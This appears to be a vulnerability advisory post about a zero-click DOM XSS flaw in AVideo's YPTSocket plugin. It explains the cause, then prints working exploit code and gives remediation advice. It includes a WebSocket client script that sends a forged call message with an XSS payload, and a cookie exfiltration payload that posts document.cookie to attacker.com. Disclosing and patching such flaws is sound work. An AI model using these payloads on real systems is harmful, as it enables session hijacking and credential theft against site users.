Listen to this Post
The vulnerability exists because the YPTSocket plugin constructs incoming call notifications using the jQuery Toast Plugin, which inserts the caller’s display name as raw HTML via jQuery’s `.html()` method. When a WebSocket message of type `call` arrives, the `from_identification` field is extracted and passed directly as the `heading` parameter to the toast function. The toast plugin then builds an HTML string ('<h2>' + heading + '</h2>') and uses `.html()` to insert it into the DOM. This method parses and executes any embedded HTML or script tags, enabling a cross-site scripting (XSS) payload. A secondary injection vector exists where the entire JSON message is stringified and placed into a single-quoted `onclick` attribute; a single quote in any field can break out and inject attributes. Although the normal UI sanitizes display names with strip_tags(), the WebSocket server relays messages without validation. An attacker using a custom WebSocket client can send a forged call with a malicious `from_identification` value, bypassing server-side sanitization. The payload executes immediately upon delivery to any online user, requiring zero interaction from the victim.
Platform: AVideo YPTSocket
Version: Unspecified
Vulnerability: XSS – DOM
Severity: Critical
date: 2026-04-01
Prediction: Patch within 14 days
What Undercode Say:
Simulate malicious WebSocket call for XSS
const ws = new WebSocket('wss://target:8888');
ws.onopen = () => ws.send(JSON.stringify({
msg: 'call', from_users_id: 1, to_users_id: 2,
from_identification: '<img src=x onerror=alert(document.cookie)>'
}));
Credential exfiltration payload from_identification: '<img src=x onerror="fetch(\'https://attacker.com/?\'+document.cookie)">'
Exploit:
Connect custom WebSocket client to target port 8888. Send crafted JSON with `from_identification` containing HTML/JS payload. Any online victim viewing page with WebSocket triggers XSS without interaction.
Protection from this CVE:
Escape heading before toast: heading: $('<span>').text(userIdentification).html(). Validate and sanitize WebSocket messages server-side. Use `textContent` instead of .html().
Impact:
Zero-click session hijacking, account takeover, self-propagating worm, credential theft. Attacker can execute arbitrary JavaScript in any online user’s browser.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

